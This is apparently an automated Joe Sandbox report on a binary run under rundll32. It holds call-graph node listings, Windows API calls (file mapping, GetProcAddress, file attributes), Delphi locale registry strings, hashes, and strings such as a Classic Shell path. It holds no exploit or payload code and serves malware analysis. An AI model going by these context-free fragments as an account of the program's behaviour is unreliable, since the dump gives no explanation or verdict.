57af46 7966->7967 7968 411580 TlsGetValue 7967->7968 7969 57af57 7968->7969 7970 4117a0 TlsGetValue 7969->7970 7971 57b068 7970->7971 7972 57b08a 7971->7972 7973 411190 TlsGetValue 7971->7973 7974 40fec0 TlsGetValue 7972->7974 7976 57b07d 7973->7976 7975 57b09a 7974->7975 7975->7917 7977 4114b0 TlsGetValue 7976->7977 7977->7972 7979 57a3ee 7978->7979 7980 57a414 7979->7980 7981 440a70 33 API calls 7979->7981 7980->7946 7981->7980 7983 434ce0 TlsGetValue 7982->7983 7986 57b490 7983->7986 7984 40fec0 TlsGetValue 7985 579bf0 7984->7985 7985->7949 7985->7950 7987 411190 TlsGetValue 7986->7987 7988 57b4c3 7986->7988 7987->7988 7988->7984 7990 434cf9 7989->7990 7994 434d38 7990->7994 7996 434d29 7990->7996 7991 434d55 7992 40fde0 TlsGetValue 7991->7992 7995 434d36 7992->7995 7993 434d5f 7997 448740 TlsGetValue 7993->7997 7994->7991 7994->7993 7995->7953 7995->7954 7998 410430 TlsGetValue 7996->7998 7997->7995 7998->7995 8000 436960 4 API calls 7999->8000 8001 579a19 8000->8001 8001->7957 8001->7962 8003 410430 TlsGetValue 8002->8003 8004 442b70 8003->8004 8005 436afb 8004->8005 8006 4113d0 TlsGetValue 8004->8006 8005->7926 8006->8005 8013 50f260 8007->8013 8019 510640 8010->8019 8014 50f289 8013->8014 8016 440a70 33 API calls 8014->8016 8017 50f2a9 8014->8017 8015 50f251 8015->7766 8016->8017 8017->8015 8018 440a70 33 API calls 8017->8018 8018->8017 8020 510669 8019->8020 8022 440a70 33 API calls 8020->8022 8023 510689 8020->8023 8021 510631 8021->7766 8022->8023 8023->8021 8024 440a70 33 API calls 8023->8024 8024->8023 8026 43c0c1 8025->8026 8027 43c070 8025->8027 8026->7784 8027->8026 8029 43bf60 8027->8029 8032 43bed0 8029->8032 8033 43bee3 8032->8033 8034 434200 50 API calls 8033->8034 8035 43bf19 8033->8035 8034->8035 8035->8026 8037 57a3e0 33 API calls 8036->8037 8038 57a297 8037->8038 8039 57b460 TlsGetValue 8038->8039 8040 57a2a0 8039->8040 8041 57a2b9 8040->8041 8042 440a70 33 API calls 8040->8042 8043 434ce0 TlsGetValue 8041->8043 8042->8041 8044 57a2ce 8043->8044 8045 440a70 33 API calls 8044->8045 8046 57a2ea 8044->8046 8045->8046 8047 57a316 8046->8047 8048 440a70 33 API calls 8046->8048 8049 57ae50 6 API calls 8047->8049 8048->8047 8050 57a32b 8049->8050 8063 57aad0 8050->8063 8053 436960 4 API calls 8054 57a346 8053->8054 8055 57a35f 8054->8055 8056 440a70 33 API calls 8054->8056 8057 57a394 8055->8057 8093 57a070 8055->8093 8056->8055 8059 40fec0 TlsGetValue 8057->8059 8061 579f6b 8059->8061 8061->7788 8062 440a70 33 API calls 8062->8057 8064 57ab26 8063->8064 8065 40fde0 TlsGetValue 8064->8065 8066 57ab33 8065->8066 8067 434ce0 TlsGetValue 8066->8067 8068 57ab43 8067->8068 8069 4104b0 TlsGetValue 8068->8069 8070 57ab53 8069->8070 8071 411190 TlsGetValue 8070->8071 8072 57ab64 8071->8072 8073 411190 TlsGetValue 8072->8073 8074 57ab75 8073->8074 8075 411580 TlsGetValue 8074->8075 8076 57ab86 8075->8076 8077 411190 TlsGetValue 8076->8077 8085 57abe6 8076->8085 8077->8085 8078 4117a0 TlsGetValue 8079 57ad8e 8078->8079 8080 410430 TlsGetValue 8079->8080 8081 57ad9e 8080->8081 8082 40fde0 TlsGetValue 8081->8082 8083 57ada8 8082->8083 8084 40fec0 TlsGetValue 8083->8084 8086 57adb8 8084->8086 8085->8078 8087 40fde0 TlsGetValue 8086->8087 8088 57adc1 8087->8088 8089 40fde0 TlsGetValue 8088->8089 8090 57adca 8089->8090 8091 40fde0 TlsGetValue 8090->8091 8092 57a338 8091->8092 8092->8053 8094 436880 5 API calls 8093->8094 8095 57a079 8094->8095 8095->8057 8095->8062 8097 411140 8096->8097 8098 436d01 GetFileAttributesW 8097->8098 8099 436d21 8098->8099 8100 436d84 8098->8100 8114 434060 8099->8114 8101 40fec0 TlsGetValue 8100->8101 8103 436d94 8101->8103 8104 40fde0 TlsGetValue 8103->8104 8105 436d9d 8104->8105 8105->7798 8106 436d34 8106->8100 8107 436d70 8106->8107 8108 437200 TlsGetValue 8106->8108 8109 436d79 GetFileAttributesW 8107->8109 8110 436d52 8108->8110 8109->8100 8127 442b00 8110->8127 8113 411580 TlsGetValue 8113->8107 8115 43408b 8114->8115 8116 434175 8115->8116 8117 436880 5 API calls 8115->8117 8116->8106 8118 4340a1 8117->8118 8118->8116 8132 436470 8118->8132 8120 4340b5 8120->8116 8121 4340ca GetFileAttributesW 8120->8121 8121->8116 8122 4340df 8121->8122 8122->8116 8123 434115 CreateFileW 8122->8123 8123->8116 8124 434150 8123->8124 8163 433d50 8124->8163 8128 410430 TlsGetValue 8127->8128 8129 442b10 8128->8129 8130 436d5f 8129->8130 8131 4114b0 TlsGetValue 8129->8131 8130->8113 8131->8130 8133 413390 18 API calls 8132->8133 8134 4364ca 8133->8134 8135 413390 18 API calls 8134->8135 8136 4364e8 8135->8136 8137 436960 4 API calls 8136->8137 8138 4364fe 8137->8138 8139 43650d 8138->8139 8140 436880 5 API calls 8138->8140 8143 436624 8139->8143 8197 4372f0 8139->8197 8140->8139 8145 417be0 33 API calls 8143->8145 8144 442b00 TlsGetValue 8146 436532 8144->8146 8147 436634 8145->8147 8149 43653e GetVolumeInformationW 8146->8149 8148 440800 TlsGetValue 8147->8148 8154 4365e3 8148->8154 8150 43661f 8149->8150 8153 436589 GetDriveTypeW 8149->8153 8207 443d70 GetLastError 8150->8207 8153->8154 8155 40fec0 TlsGetValue 8154->8155 8156 43665e 8155->8156 8157 413560 14 API calls 8156->8157 8158 43666e 8157->8158 8159 413560 14 API calls 8158->8159 8160 43667e 8159->8160 8161 40fde0 TlsGetValue 8160->8161 8162 43668a 8161->8162 8162->8120 8164 40fde0 TlsGetValue 8163->8164 8169 433dbf 8164->8169 8165 433e67 8166 433e7d CreateFileMappingW 8165->8166 8167 433f6a 8165->8167 8166->8167 8168 433ebe MapViewOfFile 8166->8168 8170 433e5b 8167->8170 8235 433c00 8167->8235 8171 433ef1 GetCurrentProcess 8168->8171 8172 433f5d CloseHandle 8168->8172 8169->8165 8183 433e27 8169->8183 8175 40fec0 TlsGetValue 8170->8175 8232 4234a0 8171->8232 8172->8167 8178 433fe0 CloseHandle 8175->8178 8177 433f11 8180 433f50 UnmapViewOfFile 8177->8180 8182 411240 TlsGetValue 8177->8182 8178->8116 8179 410430 TlsGetValue 8181 433f96 8179->8181 8180->8172 8181->8170 8186 433aa0 TlsGetValue 8181->8186 8184 433f29 8182->8184 8185 411240 TlsGetValue 8183->8185 8187 433aa0 TlsGetValue 8184->8187 8188 433e3b 8185->8188 8190 433fb9 8186->8190 8191 433f39 8187->8191 8220 433aa0 8188->8220 8194 410430 TlsGetValue 8190->8194 8192 410430 TlsGetValue 8191->8192 8195 433f49 8192->8195 8194->8170 8195->8180 8196 410430 TlsGetValue 8196->8170 8198 437309 8197->8198 8199 437324 8198->8199 8204 437344 8198->8204 8202 4117a0 TlsGetValue 8199->8202 8200 4373f1 8201 40fde0 TlsGetValue 8200->8201 8203 436522 8201->8203 8202->8203 8203->8144 8204->8200 8205 437383 8204->8205 8206 4117a0 TlsGetValue 8205->8206 8206->8203 8210 443d90 8207->8210 8211 443e03 8210->8211 8212 443daf 8210->8212 8214 440a70 33 API calls 8211->8214 8213 43ea00 TlsGetValue FormatMessageW LocalFree 8212->8213 8215 443dc8 8213->8215 8216 443e01 8214->8216 8217 440c20 50 API calls 8215->8217 8218 40fde0 TlsGetValue 8216->8218 8217->8216 8219 443d82 8218->8219 8219->8143 8225 433ae1 8220->8225 8221 433b94 8222 40fec0 TlsGetValue 8221->8222 8223 433bc4 8222->8223 8223->8196 8224 411240 TlsGetValue 8224->8225 8225->8221 8225->8224 8226 433b41 8225->8226 8227 4111e0 TlsGetValue 8226->8227 8228 433b69 8227->8228 8229 4117a0 TlsGetValue 8228->8229 8230 433b83 8229->8230 8231 411580 TlsGetValue 8230->8231 8231->8221 8246 422f10 8232->8246 8234 4234ba 8234->8177 8236 40fde0 TlsGetValue 8235->8236 8238 433c24 8236->8238 8237 433ce7 8237->8179 8240 433c49 8238->8240 8294 4208c0 8238->8294 8240->8237 8241 4090f0 TlsGetValue 8240->8241 8243 433c98 8241->8243 8242 433cdd 8245 409120 TlsGetValue 8242->8245 8243->8242 8244 4111e0 TlsGetValue 8243->8244 8244->8242 8245->8237 8247 422f3f 8246->8247 8248 422f22 8246->8248 8247->8234 8248->8247 8249 4208c0 TlsGetValue GetProcAddress 8248->8249 8250 422f59 8249->8250 8251 4208c0 TlsGetValue GetProcAddress 8250->8251 8252 422f73 8251->8252 8253 4208c0 TlsGetValue GetProcAddress 8252->8253 8254 422f8d 8253->8254 8255 4208c0 TlsGetValue GetProcAddress 8254->8255 8256 422fa7 8255->8256 8257 4208c0 TlsGetValue GetProcAddress 8256->8257 8258 422fc1 8257->8258 8259 4208c0 TlsGetValue GetProcAddress 8258->8259 8260 422fdb 8259->8260 8261 4208c0 TlsGetValue GetProcAddress 8260->8261 8262 422ff5 8261->8262 8263 4208c0 TlsGetValue GetProcAddress 8262->8263 8264 42300f 8263->8264 8265 4208c0 TlsGetValue GetProcAddress 8264->8265 8266 423029 8265->8266 8267 4208c0 TlsGetValue GetProcAddress 8266->8267 8268 423043 8267->8268 8269 4208c0 TlsGetValue GetProcAddress 8268->8269 8270 42305d 8269->8270 8271 4208c0 TlsGetValue GetProcAddress 8270->8271 8272 423077 8271->8272 8273 4208c0 TlsGetValue GetProcAddress 8272->8273 8274 423091 8273->8274 8275 4208c0 TlsGetValue GetProcAddress 8274->8275 8276 4230ab 8275->8276 8277 4208c0 TlsGetValue GetProcAddress 8276->8277 8278 4230c5 8277->8278 8279 4208c0 TlsGetValue GetProcAddress 8278->8279 8280 4230df 8279->8280 8281 4208c0 TlsGetValue GetProcAddress 8280->8281 8282 4230f9 8281->8282 8283 4208c0 TlsGetValue GetProcAddress 8282->8283 8284 423113 8283->8284 8285 4208c0 TlsGetValue GetProcAddress 8284->8285 8286 42312d 8285->8286 8287 4208c0 TlsGetValue GetProcAddress 8286->8287 8288 423147 8287->8288 8289 4208c0 TlsGetValue GetProcAddress 8288->8289 8290 423161 8289->8290 8291 4208c0 TlsGetValue GetProcAddress 8290->8291 8292 42317b 8291->8292 8293 4208c0 TlsGetValue GetProcAddress 8292->8293 8293->8247 8295 4208ea GetProcAddress 8294->8295 8296 4208fd 8294->8296 8297 420931 8295->8297 8298 4109e0 TlsGetValue 8296->8298 8299 40fe30 TlsGetValue 8297->8299 8301 42090e 8298->8301 8300 42093b 8299->8300 8300->8240 8302 40fe30 TlsGetValue 8301->8302 8302->8297 8304 4104b0 TlsGetValue 8303->8304 8305 436e26 8304->8305 8306 436e9e 8305->8306 8307 436e38 GetFileAttributesW 8305->8307 8308 436ea7 SetFileAttributesW 8306->8308 8307->8306 8309 436e48 8307->8309 8310 436eb6 GetLastError 8308->8310 8311 436ebe 8308->8311 8312 434060 73 API calls 8309->8312 8310->8311 8313 40fec0 TlsGetValue 8311->8313 8315 436e55 8312->8315 8314 436ece 8313->8314 8314->7599 8315->8306 8316 436e91 8315->8316 8317 437200 TlsGetValue 8315->8317 8318 4104b0 TlsGetValue 8316->8318 8319 436e73 8317->8319 8318->8306 8320 442b00 TlsGetValue 8319->8320 8321 436e80 8320->8321 8322 411580 TlsGetValue 8321->8322 8322->8316 8324 7f4953 8323->8324 8325 7f496c 8324->8325 8326 440a70 33 API calls 8324->8326 8325->6987 8326->8325 8328 7f48f4 8327->8328 8329 440a70 33 API calls 8328->8329 8330 7f490d 8328->8330 8329->8330 8330->6990 8332 7f484d 8331->8332 8333 7f4883 8332->8333 8334 440a70 33 API calls 8332->8334 8335 413560 14 API calls 8333->8335 8334->8333 8336 7f48a0 8335->8336 8336->6973 8338 40ff78 Sleep 8337->8338 8338->7018 8339 417be0 8340 417c0d 8339->8340 8347 417c47 8339->8347 8341 417c17 8340->8341 8342 417c49 8340->8342 8343 413d70 33 API calls 8341->8343 8344 4111e0 TlsGetValue 8342->8344 8345 417c22 8343->8345 8344->8347 8346 4100a0 TlsGetValue 8345->8346 8346->8347

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Open$QueryValue$CloseFileModuleName
                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                          • API String ID: 2701450724-3496071916
                          • Opcode ID: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                          • Instruction ID: 05af0d7f2029f71a10c68c1639b48ed8a0d1e1dacfaf04c10325f7dc7332685a
                          • Opcode Fuzzy Hash: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                          • Instruction Fuzzy Hash: 65610A71204BC589DB30DF71E8983DA23A5F78838CF51112A9B4D5BB5AEF78C695C348
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetUserDefaultUILanguage.KERNEL32 ref: 0041525E
                          • GetLocaleInfoW.KERNEL32 ref: 00415277
                            • Part of subcall function 00415080: FindFirstFileW.KERNEL32 ref: 004150B2
                            • Part of subcall function 00415080: FindClose.KERNEL32 ref: 004150CD
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                          • String ID:
                          • API String ID: 3216391948-0
                          • Opcode ID: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                          • Instruction ID: a21e750fdb81c3cb80ceca5676c95766672ab79d1740a75253142ae5867d54cb
                          • Opcode Fuzzy Hash: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                          • Instruction Fuzzy Hash: A321E476210A4089DB20EF76C8917D927A0EB88BDCF50212BFB4E57B69DF38C485C784
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 164 415080-4150c8 call 40ff70 call 411140 FindFirstFileW 169 4150d2-4150ec call 40fde0 164->169 170 4150ca-4150cd FindClose 164->170 170->169
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                          • Instruction ID: 042890e011036333e5bfd1d3754174ebbb35ecdb7fac3d7a8451519e581d693b
                          • Opcode Fuzzy Hash: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                          • Instruction Fuzzy Hash: E6F054622019C089CB71AF31C8952ED3710DB467ACF081336A66D4BBE5DE28C595C704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetMessageW.USER32 ref: 00816038
                            • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                          • Sleep.KERNEL32 ref: 00815FC0
                          Strings
                          • C:\Program Files\Classic Shell, xrefs: 00815F9C, 00815FAE
                          • 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F, xrefs: 00815FF1
